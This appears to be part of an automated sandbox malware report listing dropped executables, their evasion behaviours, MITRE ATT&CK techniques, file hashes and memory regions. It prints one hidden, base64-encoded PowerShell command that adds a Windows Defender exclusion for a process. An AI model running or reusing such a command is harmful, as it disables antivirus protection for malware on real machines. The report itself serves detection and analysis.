- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2372

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:8268

C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:6684
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:10232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBkAEQALQBNAFAAcABSAGUARgBlAFIAZQBOAGMARQAgAC0ARQB4AGMATAB1AFMASQBPAG4AUABSAE8AYwBFAHMAUwAgAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAGYAbwByAGMAZQA=
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:9364

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2152

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:8004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

Filesize
1.9MB

MD5
bcbec32483eb43840823c4f6bd653779

SHA1
3b83255512c5f268d0a1cb2997b1cc9d40f4252d

SHA256
d8a8e71a2be6d5fafa5d49029a37751c78be7e007152859233b8020a5c258167

SHA512
4cb807157807c72d599305eada37e85330314e43061f9af3ab9c44839bfc945431e320adf5259b9a9ecb531368cd9ab91d047eb8874f0ce6a8d4022ed69a6408

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DL5J84KL\dll[1]

Filesize
236KB

MD5
2ecb51ab00c5f340380ecf849291dbcf

SHA1
1a4dffbce2a4ce65495ed79eab42a4da3b660931

SHA256
f1b3e0f2750a9103e46a6a4a34f1cf9d17779725f98042cc2475ec66484801cf

SHA512
e241a48eafcaf99187035f0870d24d74ae97fe84aaadd2591cceea9f64b8223d77cfb17a038a58eadd3b822c5201a6f7494f26eea6f77d95f77f6c668d088e6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DL5J84KL\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ONPDW741\soft[1]

Filesize
3.0MB

MD5
866664b3ce72c7dad2ffc552282ddd7c

SHA1
43404be154db8ee32dc7c59de01f015235e44de2

SHA256
630af8886f6e7b8cb7b530ed641a4ddf20eec3bedd2a5aa60285b5a5805a603a

SHA512
a0b5eb5438cedaa60b6f23ea9daaa3e71cddfca906f933f3a3a44d04cb63427a1fb6ea4153bf4027d767ef5620ab0e6712257f3ea5e508d74662f1596dfcc712

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
454c5c4b128d34aee2eb765f2a9c0aa9

SHA1
4b6e92db79d964f604fd6b261b3b19ede2aea8a5

SHA256
e1e65d1697b9ac59805f677cbc8eec623a899b75b1389354f0948ad3c1513772

SHA512
17b4e146ef4f8862d06ac975204cca9ef9b077420256df92d94409715b18efb4dc63879154c1c234317a169ac63024ed43b5cb52473882dc46c588af089f25d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\10052940101\0cdf30e2d9.exe

Filesize
4.4MB

MD5
e1e2da6b5cd813d7f0ec3f00990ae47f

SHA1
a256358da54ef7e8fd065842fa592ee82f2fd3cf

SHA256
baf5e2a07be7d2663cb6ef113dd31328c69f7307fd189145189f46cc1bcd37df

SHA512
60c3454f7f242379528739cded5a0d45036c72b5e1027aeccad668e4d50fa50a737c095fc7eeddcc1b0e1649476f8305c0c66fa22e45c1711ad0af8965a28bba

Download Submit
C:\Users\Admin\AppData\Local\Temp\10472140101\VrQSuEQ.exe

Filesize
584KB

MD5
c5d9e2e38334a86e8f50dfb92e895e11

SHA1
723b222dce3677b76fda3754c7d58dcf60a7ee3a

SHA256
4d78fb22cc89fa243a5b356ee029331d52e047aac72595fb2d0e66fc6d2943dd

SHA512
65952a94ab63f509b98211db5f5544f8d962e0f9441381be0584498e5031adb5259d5ea3ab79804ed685ebd2ba162612f519bdbd580aa21d0352e1a3f05103b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\10473240101\wQI4o11.exe

Filesize
5.5MB

MD5
d66272143362242811fc9849c98b47b5

SHA1
17194970bbfe4ef0402f413fce909c3ae57e5342

SHA256
c29d978e33e1d80eb188cff6ebebd0a576480871a0c173f8132a7b14383a50a9

SHA512
9aa0267466e63c69c651a5ffd9fb0ea8285bcf7f6b6a2d72d53e8af04c8077aca2b4839d5721a9ec4a3a55a4a6675cc4e1a9950ae4f85e67bf9b6e19d1a772dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\10473300101\amnew.exe

Filesize
429KB

MD5
22892b8303fa56f4b584a04c09d508d8

SHA1
e1d65daaf338663006014f7d86eea5aebf142134

SHA256
87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f

SHA512
852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

Download Submit
C:\Users\Admin\AppData\Local\Temp\10473310101\UZPt0hR.exe

Filesize
1.2MB

MD5
bf6f64455cb1039947a3100e62f96a52

SHA1
28cdd5c2e82d4ad078420dcbf4b32b928861fcb6

SHA256
c81ece0b60ed50db7d3769388f34ba051a05c95bd026e78dabb6ce08ff91bbba

SHA512
c2ceb000b387710cf388e6699a2cb4465380bf5798d9f37c238db0701aaea6ccad1f44e6b9e45398050202ef875a5d7679890df2bb65538a0c8a9655c62c185b

Download Submit
C:\Users\Admin\AppData\Local\Temp\10473320101\4c7bc1193a.exe

Filesize
2.1MB

MD5
b716eeac8d2b82a187470f85b1db47af

SHA1
c9bd99c909c0f0d11aaf0883f8c8a10e3cc20b3f

SHA256
410b45fbefb6d7774958ce3836396a2f8b67084358b609da0080f4dcccb33a83

SHA512
28476e788b7e7ed90d7b3e6a21b75edb0ee86ea970ffeedf76360cd0d043c76beddd2c55f3850e5fafac34abecda87787ca9a54f39eee10e2f681c8b44c01519

Download Submit
C:\Users\Admin\AppData\Local\Temp\10473330101\fa6aed6b7e.exe

Filesize
5.9MB

MD5
e05432c13d42b8526ce4bc0dc240d297

SHA1
db6e9382425055030662ecdc95d6405d30dcf82a

SHA256
574c5ba90e69460799a53ea6fc88d8c6ba4b2b749f739f61779e1975e53e15d9

SHA512
56ad65cc3608f67b680599f8769a0bb0a8b16bdaaf62569c517fa54e72c12671d57472c1e88baaa13cf69a95b84887c527cba666abbca61a923d380dd71481ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\10473330101\fa6aed6b7e.exe

Filesize
528KB

MD5
f91bec97e559a4b2801d58afa36faa2b

SHA1
eab89845b9816c708f4ebe20947aeaeb6d1d86f1

SHA256
e23785ccb268ca9c1724a5c72ae2a8e97267e2c2c7e83afa051fd3c44e3baad6

SHA512
af050ebce85dbae4aa26fea17edc41dfedb834bb68671298f9f1de7dcbe21a337ee2497803281fbf04e52f1fc52828ad235f924a5df50a72ae345a188462d6aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\10473340101\RYZusWg.exe

Filesize
655KB

MD5
922e963ce085b717f4d3818a1f340d17

SHA1
ce250046d0587889ad29f485fbf0e97692156625

SHA256
bf5d1dd6ea5f4af043069d12699f9352af431ce3cdff633ff227eec441244bca

SHA512
689b6afe8755a81c428e76dadac66cfee8f81afd6fabf386cc1d1ed836c09fe318844964120f25e445fbd03995708f91609194961c9753362b6563f603fad1ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\10473351121\ccosvAs.cmd

Filesize
1.4MB

MD5
2f0f5fb7efce1c965ff89e19a9625d60

SHA1
622ff9fe44be78dc07f92160d1341abb8d251ca6

SHA256
426b6e77a4d2e72edf8cd6177578a732ca05510b56cb58d938d6e25820dc2458

SHA512
b8587d32e98693f08c9c3776ac4168204d76dd6db0d76c6afc815d6727d745f6137ae83fe85a7562517b37c320ddebc27167a9f3f14dacca33954dbe437dc920

Download Submit
C:\Users\Admin\AppData\Local\Temp\10473360101\n0hEgR9.exe

Filesize
1.1MB

MD5
3f986040ea150bfb24408c7f5677289d

SHA1
cee2ff576ec34b152ae9b7390c327fcf931fd372

SHA256
fcf94c18fbd9114e3a71142b47952f8e1cf81ef2a8a58f484d175f337d717235

SHA512
ff4cae88022f2a686d33629d80999fde444ede2755f3868a4096bde2b08360da8387ac046e116bf5e6d6bc7b4a352b33ebefc606502f7ffb41c440d638f2e07f

Download Submit
C:\Users\Admin\AppData\Local\Temp\10473370101\Rm3cVPI.exe

Filesize
354KB

MD5
27f0df9e1937b002dbd367826c7cfeaf

SHA1
7d66f804665b531746d1a94314b8f78343e3eb4f

SHA256
aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209

SHA512
ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17

Download Submit
C:\Users\Admin\AppData\Local\Temp\10473380101\mTk60rz.exe

Filesize
11.6MB

MD5
e717d08f2813115fea75f3423b85bbce

SHA1
38da94cd4447748b80e919c13108ac61cd67c486

SHA256
cf7e773ff75c1b2f3df3a804eef95b68e5f9e5c3954cb60e85916da9512757c1

SHA512
b6912bd37710a68e754822c50d4ad9b5dd359b52bc226ea699829af36161dc2ce69014919f0a8cbfe2211ceb8de2128eed2169d2e92f577405234b05191c822f

Download Submit
C:\Users\Admin\AppData\Local\Temp\10473390101\ebe0a88a02.exe

Filesize
1.8MB

MD5
4be2eb8946c8efd4fcf31c662a91fafa

SHA1
b25b928cd4e5f090613bda67a9a40ae18c57db3a

SHA256
652f1c890566dec2fef9fd2b444a28d1cc367d954a71b2bb8b5c0702fed6dc04

SHA512
7067572063aa8310c6d5f47cfef873b7a4cbfc0860b9de0ef4db74ec3ff5af7d15dfe5f3b6ddd99b27d7110672f148581d5b1044b8c20c77093a4bd8b380ccef

Download Submit
C:\Users\Admin\AppData\Local\Temp\10473410101\TbV75ZR.exe

Filesize
1.9MB

MD5
b53f9756f806ea836d98ff3dc92c8c84

SHA1
05c80bd41c04331457374523d7ab896c96b45943

SHA256
73ca9bc319d447e03a717b4f781aca8dc11a5bec82ace59751f285341e4b137c

SHA512
bd776a3f3ae229fb36f54674323ddeea0a631acfc18578860ed282667fcc5047d2b5033aba4f88f5908d909d0969081a94cb1cb3efbb9ecaeff526c0fb2ecddb

Download Submit
C:\Users\Admin\AppData\Local\Temp\10473420101\larBxd7.exe

Filesize
1.2MB

MD5
4641a0bec2101c82f575862f97be861c

SHA1
0dd1ee06cdb7ba9ef2aa1dc44c80f1bc2586d33b

SHA256
fc2ac17498bd7846607110e66426bdad0ab5302f5c7978dd72c20d99166292e1

SHA512
da87190b368b99feafdb6cfb2fe236c94741573f494ca1cc9127f3a34e9112e1c8d4bf794841b4f00d3f083bc8239226d7d6ffecb45eb02299ff4e03e6e3749a

Download Submit
C:\Users\Admin\AppData\Local\Temp\10473430101\9sWdA2p.exe

Filesize
1.1MB

MD5
5adca22ead4505f76b50a154b584df03

SHA1
8c7325df64b83926d145f3d36900b415b8c0fa65

SHA256
aa7105a237dc64c8eb179f18d54641e5d7b9ab7da7bf71709a0d773f20154778

SHA512
6192d61e777c59aa80c236b2f3e961795b7ff9971327c4e3270803d356ecf38949811df680a372259a9638ccdb90fc1271fb844f1f35656d5b317c96081f396e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cattle.psd.bat

Filesize
11KB

MD5
ec90ed340e87d540b3b2bfd46026424c

SHA1
94d88488e005158000815c918c59e868f221a1c6

SHA256
80f117d62a42a9c74efb37e180cc85796f56e3eedc76c5b8962837fb964f32e0

SHA512
57d231bae221e173fb8707638292ab69fd222760c4da4404dea0c392e442d53f92381ef23608c4e4caa1c779b987e20b98a50d2c2b96c0354fda2700ad6388d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3t52A.exe

Filesize
2.4MB

MD5
41eebf4c3372a2721dc1bf28462708bb

SHA1
a6a1fbbdee769673e08aa66144938fd92a2df042

SHA256
a33351b13a3251eb54fb41ffd7bdb2f4dedbdbb9769e4bacd412aa15fc4e7fc8

SHA512
2290b118d386ccb74c2ca71b41191e201a270a8a012d409fceaf7a996a07d835187f853addb2523d8e8eac613a40b18f6b8a513e3bf7731079c73bc51542dfdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\O7J17.exe

Filesize
3.8MB

MD5
68497d5a27db07bc24ad7c9863e4c1e0

SHA1
ecb709fe8ec1fc02077f2ec06897f0cb674a3cd7

SHA256
40575160d74a5cd3f79f5600e9c72d82d871fc7236f11ca4fa26a6c5934f368f

SHA512
c1bb1408f7e7a4599748656028cb30db604d5828f7c63006830245cec0a0cb420358fc5c84de93290e026efc5a3251ab21fdf90d7a2b6f5195efdde6d359a868

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1o70A8.exe

Filesize
1.8MB

MD5
2c1f6938131557196965a30b150b0f2e

SHA1
38999e437a770086afeec92a65802e705bac1e34

SHA256
5e77e83a11874da5619a9cca31b2326e056734f68b874b8191055dc2249f578c

SHA512
947257a216c7db1c4c0aaa9391895e29765eab21d9be56354762499c37543312d68f66caece75d699293aa2ff7405c20304057316f6ee331f73a3ac18025e1d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2q8021.exe

Filesize
2.0MB

MD5
0a95e13a5666a3acd4f6c32197852121

SHA1
c4daabbe2319262fb8e755917d05da5eda680717

SHA256
0d3e088163d0da14ee7175bfd9af8e89c678fbc1861ce2502b07eddb778d069c

SHA512
06769928ba765d55654f81c3b0970d53dc5d570cba3afa531078b90cc0ee92b0ceff82879ec6116563cb35e83feecdf16bf8775f79628bef68104d27cd363106

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

Filesize
81KB

MD5
69801d1a0809c52db984602ca2653541

SHA1
0f6e77086f049a7c12880829de051dcbe3d66764

SHA256
67aca001d36f2fce6d88dbf46863f60c0b291395b6777c22b642198f98184ba3

SHA512
5fce77dd567c046feb5a13baf55fdd8112798818d852dfecc752dac87680ce0b89edfbfbdab32404cf471b70453a33f33488d3104cd82f4e0b94290e83eae7bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rjapn0vv.mc2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_6992_133883928995493747\ZSoeRVBe.exe

Filesize
22.4MB

MD5
a5c226a8897030e93baec7ef14b73012

SHA1
f3e592fbd11ddd9de559824b7ac99875ff71e6b3

SHA256
b2613d8e0c580c24c43c686181421b865c9af866f64dd2234527358ba85f836a

SHA512
d3ef0424d3c4a0f37978e1e5e0a2f361016d027159775277500be6a31fcb986a650acfc26b9617762436abbd249e1f46e65053d2a7b14f94bf14becf7f95a5dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_6992_133883928995493747\python312.dll

Filesize
6.6MB

MD5
166cc2f997cba5fc011820e6b46e8ea7

SHA1
d6179213afea084f02566ea190202c752286ca1f

SHA256
c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546

SHA512
49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_6992_133883928995493747\vcruntime140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost015.exe

Filesize
2.9MB

MD5
b826dd92d78ea2526e465a34324ebeea

SHA1
bf8a0093acfd2eb93c102e1a5745fb080575372e

SHA256
7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b

SHA512
1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17

Download Submit
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe

Filesize
1.3MB

MD5
15bdc4bd67925ef33b926843b3b8154b

SHA1
646af399ef06ac70e6bd43afe0f978f0f51a75fd

SHA256
4f0b2c61bccfd9aa3db301ee4e15607df41ded533757de34c986a0ff25b6246d

SHA512
eac0736a06d0835758318d594d3560ee6be82889020a173463943956dd400d08cf1174a4c722dc45a3f3c034131982f4b19ff27db1163838afbfac37f397eaf8

Download Submit
memory/916-34-0x0000000000190000-0x000000000064E000-memory.dmp

Filesize
4.7MB

Download
memory/916-33-0x0000000000190000-0x000000000064E000-memory.dmp

Filesize
4.7MB

Download
memory/1384-72-0x0000000005080000-0x000000000511C000-memory.dmp

Filesize
624KB

Download
memory/1384-70-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1384-21599-0x00000000068F0000-0x0000000006E94000-memory.dmp

Filesize
5.6MB

Download
memory/1384-71-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1384-21598-0x00000000062A0000-0x0000000006332000-memory.dmp

Filesize
584KB

Download
memory/1384-175-0x0000000005750000-0x00000000057B6000-memory.dmp

Filesize
408KB

Download
memory/2140-30390-0x0000000000250000-0x0000000000700000-memory.dmp

Filesize
4.7MB

Download
memory/2140-30394-0x0000000000250000-0x0000000000700000-memory.dmp

Filesize
4.7MB

Download
memory/2152-30435-0x00000000007B0000-0x0000000000C70000-memory.dmp

Filesize
4.8MB

Download
memory/2152-30433-0x00000000007B0000-0x0000000000C70000-memory.dmp

Filesize
4.8MB

Download
memory/2240-50-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2240-49-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2372-24472-0x00000000007B0000-0x0000000000C70000-memory.dmp

Filesize
4.8MB

Download
memory/3016-211-0x0000000000400000-0x0000000000CE3000-memory.dmp

Filesize
8.9MB

Download
memory/3016-21611-0x0000000000400000-0x0000000000CE3000-memory.dmp

Filesize
8.9MB

Download
memory/3368-55-0x00000000007B0000-0x0000000000C70000-memory.dmp

Filesize
4.8MB

Download
memory/3368-54-0x00000000007B0000-0x0000000000C70000-memory.dmp

Filesize
4.8MB

Download
memory/4280-222-0x0000000000720000-0x00000000008A8000-memory.dmp

Filesize
1.5MB

Download
memory/4280-228-0x0000000000720000-0x00000000008A8000-memory.dmp

Filesize
1.5MB

Download
memory/4280-230-0x0000000000720000-0x00000000008A8000-memory.dmp

Filesize
1.5MB

Download
memory/4280-229-0x0000000000720000-0x00000000008A8000-memory.dmp

Filesize
1.5MB

Download
memory/4280-226-0x0000000000720000-0x00000000008A8000-memory.dmp

Filesize
1.5MB

Download
memory/4280-227-0x0000000000720000-0x00000000008A8000-memory.dmp

Filesize
1.5MB

Download
memory/4280-225-0x0000000000720000-0x00000000008A8000-memory.dmp

Filesize
1.5MB

Download
memory/4280-224-0x0000000000720000-0x00000000008A8000-memory.dmp

Filesize
1.5MB

Download
memory/4280-220-0x0000000140000000-0x000000014043E000-memory.dmp

Filesize
4.2MB

Download
memory/4280-223-0x0000000000720000-0x00000000008A8000-memory.dmp

Filesize
1.5MB

Download
memory/4344-193-0x0000000000400000-0x00000000008BB000-memory.dmp

Filesize
4.7MB

Download
memory/4344-21612-0x0000000000400000-0x00000000008BB000-memory.dmp

Filesize
4.7MB

Download
memory/4344-191-0x0000000000400000-0x00000000008BB000-memory.dmp

Filesize
4.7MB

Download
memory/4364-21658-0x000001E9A3580000-0x000001E9A3628000-memory.dmp

Filesize
672KB

Download
memory/4364-24473-0x000001E9BDC20000-0x000001E9BDC74000-memory.dmp

Filesize
336KB

Download
memory/4364-24462-0x000001E9A3A50000-0x000001E9A3AA6000-memory.dmp

Filesize
344KB

Download
memory/4364-24463-0x000001E9A5380000-0x000001E9A53CC000-memory.dmp

Filesize
304KB

Download
memory/4364-21659-0x000001E9BDB10000-0x000001E9BDC1A000-memory.dmp

Filesize
1.0MB

Download
memory/4420-28-0x00000000006B0000-0x0000000000B70000-memory.dmp

Filesize
4.8MB

Download
memory/4420-15-0x00000000006B0000-0x0000000000B70000-memory.dmp

Filesize
4.8MB

Download
memory/4660-149-0x0000000000400000-0x0000000000681000-memory.dmp

Filesize
2.5MB

Download
memory/4692-51-0x00000000007B0000-0x0000000000C70000-memory.dmp

Filesize
4.8MB

Download
memory/4692-177-0x00000000007B0000-0x0000000000C70000-memory.dmp

Filesize
4.8MB

Download
memory/4692-87-0x00000000007B0000-0x0000000000C70000-memory.dmp

Filesize
4.8MB

Download
memory/4692-52-0x00000000007B0000-0x0000000000C70000-memory.dmp

Filesize
4.8MB

Download
memory/4692-29-0x00000000007B0000-0x0000000000C70000-memory.dmp

Filesize
4.8MB

Download
memory/4692-130-0x00000000007B0000-0x0000000000C70000-memory.dmp

Filesize
4.8MB

Download
memory/5124-161-0x000001107C710000-0x000001107C781000-memory.dmp

Filesize
452KB

Download
memory/5124-152-0x0000000000580000-0x0000000000582000-memory.dmp

Filesize
8KB

Download
memory/5124-176-0x000001107C710000-0x000001107C781000-memory.dmp

Filesize
452KB

Download
memory/5124-162-0x000001107C710000-0x000001107C781000-memory.dmp

Filesize
452KB

Download
memory/5124-160-0x000001107C710000-0x000001107C781000-memory.dmp

Filesize
452KB

Download
memory/5124-153-0x000001107C710000-0x000001107C781000-memory.dmp

Filesize
452KB

Download
memory/5448-24556-0x0000000007BD0000-0x0000000007BD8000-memory.dmp

Filesize
32KB

Download
memory/5448-24549-0x0000000007750000-0x00000000077F3000-memory.dmp

Filesize
652KB

Download
memory/5448-24553-0x0000000007AE0000-0x0000000007AEE000-memory.dmp

Filesize
56KB

Download
memory/5448-24554-0x0000000007AF0000-0x0000000007B04000-memory.dmp

Filesize
80KB

Download
memory/5448-24555-0x0000000007BF0000-0x0000000007C0A000-memory.dmp

Filesize
104KB

Download
memory/5448-24537-0x0000000007700000-0x0000000007732000-memory.dmp

Filesize
200KB

Download
memory/5448-24550-0x0000000007920000-0x000000000792A000-memory.dmp

Filesize
40KB

Download
memory/5448-24551-0x0000000007AB0000-0x0000000007AC1000-memory.dmp

Filesize
68KB

Download
memory/5448-24548-0x00000000076E0000-0x00000000076FE000-memory.dmp

Filesize
120KB

Download
memory/5448-24538-0x000000006F8C0000-0x000000006F90C000-memory.dmp

Filesize
304KB

Download
memory/5744-163-0x000001923B060000-0x000001923B082000-memory.dmp

Filesize
136KB

Download
memory/9364-30346-0x0000021DD7910000-0x0000021DD792C000-memory.dmp

Filesize
112KB

Download
memory/9364-30349-0x0000021DD7A90000-0x0000021DD7A9A000-memory.dmp

Filesize
40KB

Download
memory/9364-30348-0x0000021DD7A80000-0x0000021DD7A88000-memory.dmp

Filesize
32KB

Download
memory/9364-30347-0x0000021DD7A70000-0x0000021DD7A7A000-memory.dmp

Filesize
40KB

Download
memory/10316-24516-0x0000000007BA0000-0x0000000007C36000-memory.dmp

Filesize
600KB

Download
memory/10316-24514-0x0000000006E00000-0x0000000006E1A000-memory.dmp

Filesize
104KB

Download
memory/10316-24513-0x0000000008220000-0x000000000889A000-memory.dmp

Filesize
6.5MB

Download
memory/10316-24506-0x0000000006920000-0x000000000696C000-memory.dmp

Filesize
304KB

Download
memory/10316-24505-0x00000000068D0000-0x00000000068EE000-memory.dmp

Filesize
120KB

Download
memory/10316-24525-0x0000000007F70000-0x0000000008068000-memory.dmp

Filesize
992KB

Download
memory/10316-24517-0x0000000006F00000-0x0000000006F22000-memory.dmp

Filesize
136KB

Download
memory/10316-24524-0x00000000033E0000-0x00000000033E8000-memory.dmp

Filesize
32KB

Download
memory/10316-24567-0x000000000DAE0000-0x000000000DB2E000-memory.dmp

Filesize
312KB

Download
memory/10316-24502-0x00000000063C0000-0x0000000006714000-memory.dmp

Filesize
3.3MB

Download
memory/10316-24492-0x00000000062E0000-0x0000000006346000-memory.dmp

Filesize
408KB

Download
memory/10316-24491-0x0000000005B40000-0x0000000005B62000-memory.dmp

Filesize
136KB

Download
memory/10316-24490-0x0000000005C40000-0x0000000006268000-memory.dmp

Filesize
6.2MB

Download
memory/10316-24489-0x0000000005500000-0x0000000005536000-memory.dmp

Filesize
216KB

Download
memory/10316-24566-0x000000000D910000-0x000000000DAD2000-memory.dmp

Filesize
1.8MB

Download
memory/10316-24565-0x000000000D580000-0x000000000D632000-memory.dmp

Filesize
712KB

Download
memory/10316-24564-0x000000000D470000-0x000000000D4C0000-memory.dmp

Filesize
320KB

Download
memory/10316-24562-0x000000000D300000-0x000000000D30A000-memory.dmp

Filesize
40KB

Download
memory/10316-24560-0x000000000D180000-0x000000000D19A000-memory.dmp

Filesize
104KB

Download
memory/10316-24559-0x000000000D000000-0x000000000D154000-memory.dmp

Filesize
1.3MB

Download